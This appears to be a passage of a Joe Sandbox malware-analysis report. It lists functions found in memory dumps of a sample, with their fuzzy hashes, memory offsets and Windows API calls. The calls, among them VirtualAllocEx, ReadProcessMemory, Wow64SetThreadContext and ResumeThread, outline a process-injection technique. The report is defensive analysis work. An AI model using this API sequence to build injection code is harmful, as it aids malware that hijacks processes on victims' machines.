Opcode Fuzzy Hash: a9133fa50155c664ae3481082171c811cc62bd78ccb7c78c9c72c5d80825f6d2
Instruction Fuzzy Hash: 0A2105B5D002499FDB10CF9AD884ADEBBF8EB48320F14841AE954A3211D378A940CF61

Function 07604E08 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07604E86

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 349a33992835837ea76d04112d432a31b3be42007374961650938c72184041d1
Instruction ID: ab25abf07079439d8cabefd0d53d1b4010f66ae69990d489a46ae46a2fc38c97
Opcode Fuzzy Hash: 349a33992835837ea76d04112d432a31b3be42007374961650938c72184041d1
Instruction Fuzzy Hash: 7E2138B1D003098FDB24DFAAC4857AEBBF4EF48310F548429D959A7280CB789945CFA4

Function 07605088 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605110

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 024a8b0a779c50e7efbf141fb054db9afa8d8042f09138500028761b09f4e4d5
Instruction ID: c8de5fc0c8a4f44a55b8850085ea76fd59ebce3985aa9295942b322f0303b445
Opcode Fuzzy Hash: 024a8b0a779c50e7efbf141fb054db9afa8d8042f09138500028761b09f4e4d5
Instruction Fuzzy Hash: 502126B5C003499FDB10DFA9C841BDEBBF1FF48310F50842AE959A7280C7399510CB65

Function 07605090 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605110

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fb69c84a1555d39f989522589968fd1d38b28ad7203f4e538b8ecee21f95b308
Instruction ID: 96497f2468a74b6d535f673ce4f5747f3a2a2cca0f70fad2d622dbb90cee1619
Opcode Fuzzy Hash: fb69c84a1555d39f989522589968fd1d38b28ad7203f4e538b8ecee21f95b308
Instruction Fuzzy Hash: BD2116B1C003499FDB14DFAAC841BDEBBF5FF48310F508429E959A7240C7399951CBA4

Function 0186D710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D797

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4ca14fa7119016753509673c354aac59561642ac67f37c4a57881bffd40996ee
Instruction ID: d8e89b4572189e6eee0f3bb2d129c777fcc789d5555ca541b9d28b7691e4fd5d
Opcode Fuzzy Hash: 4ca14fa7119016753509673c354aac59561642ac67f37c4a57881bffd40996ee
Instruction Fuzzy Hash: 4A21E4B5D002499FDB10CFAAD884ADEBFF8EB48320F14841AE954A3350D379A944CF65

Function 0761C324 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0761EF1A,?,?,?,?,?), ref: 0761EFBF

Memory Dump Source

Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 0c233001593481fe333a2424d653008f884eeea7a2bc0fe2c6aa7c0bbb87b5b2
Instruction ID: 458221a50a92de36da52635e5bee2eb66c8336fa584d0817fe7cee577068c4a6
Opcode Fuzzy Hash: 0c233001593481fe333a2424d653008f884eeea7a2bc0fe2c6aa7c0bbb87b5b2
Instruction Fuzzy Hash: 591159B580034D9FDB10CFAAC848BDEBFF8EB48320F58841AE915A3210C335A954CFA5

Function 07604ED8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07604F4E

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 85474e46db3454f15c99c6a9a166e7d0e7cc24faec7c2049143b2f681791c6a2
Instruction ID: 6aa7a73f1ffa1d1e3e97a237d0bb65651c1c0a59633ff8f74e083468da82538b
Opcode Fuzzy Hash: 85474e46db3454f15c99c6a9a166e7d0e7cc24faec7c2049143b2f681791c6a2
Instruction Fuzzy Hash: B11159B5C003499FDB24DFA9C845BDEBFF5AF48320F14881AE519A7650CB359540CFA4

Function 07604EE0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07604F4E

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7f5799efb2914e8f5be0b22ba2eed1d2b68bde339ad90ffba5d33fe0742e82c0
Instruction ID: 0f0b5b20f9dc364d7aa31e0eac02c097a6b2296e192b4f2922575ba4793bfb2e
Opcode Fuzzy Hash: 7f5799efb2914e8f5be0b22ba2eed1d2b68bde339ad90ffba5d33fe0742e82c0
Instruction Fuzzy Hash: 781114719003499FDB24DFAAC845BDEBBF5AB88320F148819E929A7250CB759940CBA4

Function 07604919 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07604982

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 96a7e2e0faf8a63161490d9a8155a41686ac1dbb85f6d37f3ca0d197e0f1a69e
Instruction ID: bff012e50ad402e3b5f6cdea9e1afae21023b41f118f23b45b91c0d3bde9472d
Opcode Fuzzy Hash: 96a7e2e0faf8a63161490d9a8155a41686ac1dbb85f6d37f3ca0d197e0f1a69e
Instruction Fuzzy Hash: D21149B1D003498FDB24DFAAC445B9EBBF4EF49214F10882DD519A7640CA795940CB94

Function 07604920 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07604982

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: da37f4cb51dcd9e9149b22c51323cf6c8a61cae083158690b5ad7273c655d18c
Instruction ID: ea547f8e24c043e7d44ab7d4b54d97165486ac13c3bc0752410c866e26762b03
Opcode Fuzzy Hash: da37f4cb51dcd9e9149b22c51323cf6c8a61cae083158690b5ad7273c655d18c
Instruction Fuzzy Hash: F71128B1D003498FDB24DFAAC445B9EFBF5EF48324F248429D559A7240CB756941CB94

Function 07601BFC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07608A3D

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: bb56969f4425e1b6de72225f9b46d8dcfa24a643b30aa33a767b486f32157c8a
Instruction ID: 573560d5ee40188bd5c8a3ca98d6f72fef08b8aee00d8b7fccaa9a373a624c20
Opcode Fuzzy Hash: bb56969f4425e1b6de72225f9b46d8dcfa24a643b30aa33a767b486f32157c8a
Instruction Fuzzy Hash: 9311F2B58003499FDB20DF9AD889BDEBBF8EB48320F108419E919A7640C375A944CFA1

Function 0186B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0186B07E

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6b70282f35a823a2ffe3cadc1dba6a4f9ee9c8d3d56edcb494de6e9623335764
Instruction ID: f4a5cd2dfeb1ac2fc44d213a891baf9dfe43aac01eecbba7a874f63e5b4f890a
Opcode Fuzzy Hash: 6b70282f35a823a2ffe3cadc1dba6a4f9ee9c8d3d56edcb494de6e9623335764
Instruction Fuzzy Hash: 9011D2B5D003498FDB24DF9AC444B9EFBF8EB48314F10841AD569A7610D379A645CFA1

Function 076089D8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07608A3D

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 686b4a14de56b255e64ae70e9fbd04bd5203dca698a4506bb07de76ec1c52ac5
Instruction ID: 75b19bc5dd47e580172c802e0d94a6f165f733e33b621db1cf7acb6749e4558c
Opcode Fuzzy Hash: 686b4a14de56b255e64ae70e9fbd04bd5203dca698a4506bb07de76ec1c52ac5
Instruction Fuzzy Hash: FA11E0B58003499FDB10DF9AD885BDEBBF8EB48324F10881AE959A3740C375A944CFA1

Function 08F83EE8 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

(q, xrefs: 08F84095

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 4a7609ee4c06c96aaf63552fc8398323587fbd3deca9eb6b2cee35122810d9e1
Instruction ID: a4dc92b49b50984628793bde9282f474fea129f2b325ecc396ab851a4b5ac805
Opcode Fuzzy Hash: 4a7609ee4c06c96aaf63552fc8398323587fbd3deca9eb6b2cee35122810d9e1
Instruction Fuzzy Hash: 8761D231A00302DFDB25EB79C858B6EBBB6EF94211F14842DE8069B394DF359C45CB95

Function 08F824E0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

(q, xrefs: 08F8251C

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 57887c853cb06adbdacb7519401a2ef9b9a936e6e97ae33c272b837cf311418f
Instruction ID: 3c8cece9c5770c7b6141ddbedfe64a8420007fdfa9f3683bf7265afa251bba72
Opcode Fuzzy Hash: 57887c853cb06adbdacb7519401a2ef9b9a936e6e97ae33c272b837cf311418f
Instruction Fuzzy Hash: EC619F75A11209DFCB19DF78D558A6EBBB2FF88312F148169E806EB341EA31E841CB51

Function 08F82BF0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

(q, xrefs: 08F84F24

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: d2ba2ce84a908d0b23d4e1d57c7af1057fa95231c5d9498d2c13e9bc4661dae2
Instruction ID: 6991b437d8bc89a60db3a02b23950e926e7b08bc882f3da4512c36aec684409b
Opcode Fuzzy Hash: d2ba2ce84a908d0b23d4e1d57c7af1057fa95231c5d9498d2c13e9bc4661dae2
Instruction Fuzzy Hash: 2C31BFB1E043598FDB14DFA9D844BAEBBF9EB89210F14842EE809E7340D7749D01CBA5

Function 08F89BC0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

8q, xrefs: 08F89CC5

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: 8q
API String ID: 0-4083045702
Opcode ID: 2031627365f23fceeafc85ecb7183e9fafab65274c5386e9a902d55772335dfb
Instruction ID: 240892559b391178954e05039eeb755616bc392a2277d5a8db493788f087b9e3
Opcode Fuzzy Hash: 2031627365f23fceeafc85ecb7183e9fafab65274c5386e9a902d55772335dfb
Instruction Fuzzy Hash: 254117B5E04209DBCB04EFA9E884AFEBFF6FB89311F108429E816A7254CB755945CF50

Function 08F89BB0 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

8q, xrefs: 08F89CC5

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: 8q
API String ID: 0-4083045702
Opcode ID: 5bf7402b9bb414b13ec31bfa127d851ff892225a04ddd83139f66287efd16488
Instruction ID: 069ff5a044e8dd26be332beb90972dbc021ebc07f6c08daaff6dbe0ac4ba3520
Opcode Fuzzy Hash: 5bf7402b9bb414b13ec31bfa127d851ff892225a04ddd83139f66287efd16488
Instruction Fuzzy Hash: 004175B5E0420ADFCB05EFA9D8846BEBFF6FB8A301F108429E406A7254C7754942CF60

Function 08F8E349 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

Teq, xrefs: 08F8E447

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: cfb6263b9ca7226bf1bf933a461aa722a28b9ccc82e40e5f8a61ca942629cc07
Instruction ID: 9e9a5ac1001acf5625f534b7110e6bc25c12a5124eac4a4167eedd6355e7cfc7
Opcode Fuzzy Hash: cfb6263b9ca7226bf1bf933a461aa722a28b9ccc82e40e5f8a61ca942629cc07
Instruction Fuzzy Hash: 0C3108B9E04248CBDB14DFFAC9456EEBBB6BF89301F14902AD419AB358DB745906CF40

Function 08F8E3DE Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

Teq, xrefs: 08F8E4AF

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 46efc33ebf7f836822cd2e7cadf3e484df3b47f9cfc0e98959421e983a3a37df
Instruction ID: aa054a7d4377bd6b3e1c216e602c37d270c001de5e7ffccc06b73f10e45dfb7c
Opcode Fuzzy Hash: 46efc33ebf7f836822cd2e7cadf3e484df3b47f9cfc0e98959421e983a3a37df
Instruction Fuzzy Hash: FD31C174E04209CFDB08DFA9C484AEDBBB2FF48301F249029E919AB365D7309945CB50

Function 08F8E358 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

Teq, xrefs: 08F8E447

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 522f48f706621b121600c982f4d97619c3817d1e82ec9f1b001f1691b653f8bc
Instruction ID: b616a23d49223787401ca23a127d7b0d59f2b0c0ae42e489858c1ad23bb6023a
Opcode Fuzzy Hash: 522f48f706621b121600c982f4d97619c3817d1e82ec9f1b001f1691b653f8bc
Instruction Fuzzy Hash: 0D31D4B4E04218CBDB18DFEAC8446EEFBB6BF89301F14902AD419AB358DB705946CB50

Function 08F88DA8 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

LRq, xrefs: 08F88E4E

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 9ac24580462b02607b0a92e2989c164308b500d6481d4e864cb5c3c56e5df571
Instruction ID: 2914c01d0123216bebcfefa861f980c5a11125c73d34369de558d564eaa14c60
Opcode Fuzzy Hash: 9ac24580462b02607b0a92e2989c164308b500d6481d4e864cb5c3c56e5df571
Instruction Fuzzy Hash: F03118B5E15218CFDB04EFAAC8456AEBBF6BF89301F54802AD809B7359DB345906CF50

Function 08F88DB8 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

LRq, xrefs: 08F88E4E

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: fd92fed6e1c495bf4308b68c7f1c0d8876f380199d803cbaf49d33da3c5b7555
Instruction ID: e42d321e8e414aa0bde14d5a32a0f617e0998db8bd4d31df3ec0a4cb5a9bbe91
Opcode Fuzzy Hash: fd92fed6e1c495bf4308b68c7f1c0d8876f380199d803cbaf49d33da3c5b7555
Instruction Fuzzy Hash: 3431D7B5E14218CBDB08DFAAC8446AEBBF6FF89301F549029D809A7358DB345906CF50

Function 08F88E1B Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

LRq, xrefs: 08F88E4E

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 3cf0f8058ead02d645e165c3b0a1d199889b2b208c150c2e6a74d3357a376e47
Instruction ID: 80575a4672eaa4f028406bc1a7583d25ad6e25ff3cda08f7008c2217a1f4ac35
Opcode Fuzzy Hash: 3cf0f8058ead02d645e165c3b0a1d199889b2b208c150c2e6a74d3357a376e47
Instruction Fuzzy Hash: 5711D4B5E19258CFCB00DFA9D4909ADBBF2FB99301F505069E809A7385DB349D05CF10

Function 08F8E3C7 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

Teq, xrefs: 08F8E4AF

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 76a3ee1a7050c6a8b61ec6efac47c0a7ae73b90a9d8b4b7ad467e3591f0d6c66
Instruction ID: 78c831e9f468cc94adfb4c98dd7abcfe4f94d9472021306a2470426ae1d25237
Opcode Fuzzy Hash: 76a3ee1a7050c6a8b61ec6efac47c0a7ae73b90a9d8b4b7ad467e3591f0d6c66
Instruction Fuzzy Hash: 15118075E00209DFDB04DFE8D4849ADFBB2FF88310F14812AE919AB364C6319955CF50

Function 08F80040 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7075c54213cbb2e1b3479848571fa89183d25b98f95558dccb5d31e231d7d5a2
Instruction ID: b53735d14be6e5cd21ad0d4e2d4c16d8ec508a8bea06307e0bbcb17a24968827
Opcode Fuzzy Hash: 7075c54213cbb2e1b3479848571fa89183d25b98f95558dccb5d31e231d7d5a2
Instruction Fuzzy Hash: 89226131A0070ADFCF15EF64C440ADDBBB1FF85300F50869AE949AB251EB70EA85CB91

Function 08F845F8 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cafefec7a16d7c108e405864bb816e58e192e89ca92d7ed39928c6e739c011f8
Instruction ID: 1cb3e2c7693798a87ad87ff4210aeb7a168f389d5fb17068fe916f42c40ca5ef
Opcode Fuzzy Hash: cafefec7a16d7c108e405864bb816e58e192e89ca92d7ed39928c6e739c011f8
Instruction Fuzzy Hash: 2BD1C2B1F00206CFCB15BF78C9486AEBFB1FF54202F6544A9D446A7295E730C861CB99

Function 08F88A70 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9808b9494ff594f933a229b1521ca7f16edbccf60d757cc5757c12dfcbf2236
Instruction ID: 91f462f897ea63fb1c78b631478808f1e631efe8acc757c8c724ea171697f342
Opcode Fuzzy Hash: c9808b9494ff594f933a229b1521ca7f16edbccf60d757cc5757c12dfcbf2236
Instruction Fuzzy Hash: 189137B9E15209CFCB04EFA9D444AEEBBF6FB89341F90902AD815A7385DB349941CF50

Function 08F85C10 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3befc1692ad7b9851451529b79ed787f15e0c150d2acb0ebfe7ced6189287d98
Instruction ID: 6eafcce64a4b13a1b2206c8c4a0f6691de20ccf6edd9c42f40d83d949a389577
Opcode Fuzzy Hash: 3befc1692ad7b9851451529b79ed787f15e0c150d2acb0ebfe7ced6189287d98
Instruction Fuzzy Hash: 88A1B475911619CFCB10EF68C844A99FBB1FF49314F05C699E949BB311EB30AA89CF90

Function 08F82C09 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf2b291d65496568c2254408702c618a0eb5a628273fbb937a2cb206a2b7830
Instruction ID: 333a33c3c4dd81881b9d2318e9e2829c7c056f9ad2216c404adf645c336c5ac3
Opcode Fuzzy Hash: daf2b291d65496568c2254408702c618a0eb5a628273fbb937a2cb206a2b7830
Instruction Fuzzy Hash: 01915634A00354CFCB19EFB8C988A99BBB2FF45305F1484A9D8089F36ADB71E945CB40

Function 08F82C18 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7507ab0fa02dab43a4be94c9344b3d976de2593d717a633a58950dfa39c7f3e7
Instruction ID: ba947e98620024ac41b8e9dc1ba8b16cd61806242ff836d2c5b3475e641893e5
Opcode Fuzzy Hash: 7507ab0fa02dab43a4be94c9344b3d976de2593d717a633a58950dfa39c7f3e7
Instruction Fuzzy Hash: FF810634A00345CFCB19EFA8C598998BBB2FF49305F1585A9D809AF36ADB71E945CF40

Function 08F887B1 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfdf90bf1010bea41ce39098d46edb8c8a27a07135b09e2af18fc41f45a98ca3
Instruction ID: 4cc39ae9537a91fcbc5a004ee71dece2ce73d0243ae3c9c2e1bd4f9edbd8607f
Opcode Fuzzy Hash: cfdf90bf1010bea41ce39098d46edb8c8a27a07135b09e2af18fc41f45a98ca3
Instruction Fuzzy Hash: D16129B9E15209CFCB04EFA9D484AAEBBB6FB89341F509029E815A7385DB349D41CF50

Function 08F887C0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257bec1ac465aa718d0f3ccb1131d8f4f49359bbc010f2278c07c0f9472b76c9
Instruction ID: 97b7c64ff849b34bba43c85704187e58e3c11934ae24aa39f8f48943670adf86
Opcode Fuzzy Hash: 257bec1ac465aa718d0f3ccb1131d8f4f49359bbc010f2278c07c0f9472b76c9
Instruction Fuzzy Hash: F961FBB9E15209CFCB14EFB9D484AAEBBB6FB89341F509029E815A7384DB349D41CF50

Function 08F85C00 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef64d9ae4b89186a19ae95e5a4b375585c5026b9a1baf584a112aa1e829029b6
Instruction ID: 237d8a0f8f465f47eaf21b05844e20487aad3c036f00f17382d13ee47f00a6de
Opcode Fuzzy Hash: ef64d9ae4b89186a19ae95e5a4b375585c5026b9a1baf584a112aa1e829029b6
Instruction Fuzzy Hash: 0171F575911619CFCB10EF68C944A98BBB1FF49314F05C699D849BB311EB30AAC9CF90

Function 08F8889C Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb3a63d2d9be1a8896e57f6e8b23e31a87006e11842c15c4b2728a98c27dae4
Instruction ID: 48c6aab4c71da349d2273efd9f16771d46f54147b8738983a8a88d8531d19e81
Opcode Fuzzy Hash: ddb3a63d2d9be1a8896e57f6e8b23e31a87006e11842c15c4b2728a98c27dae4
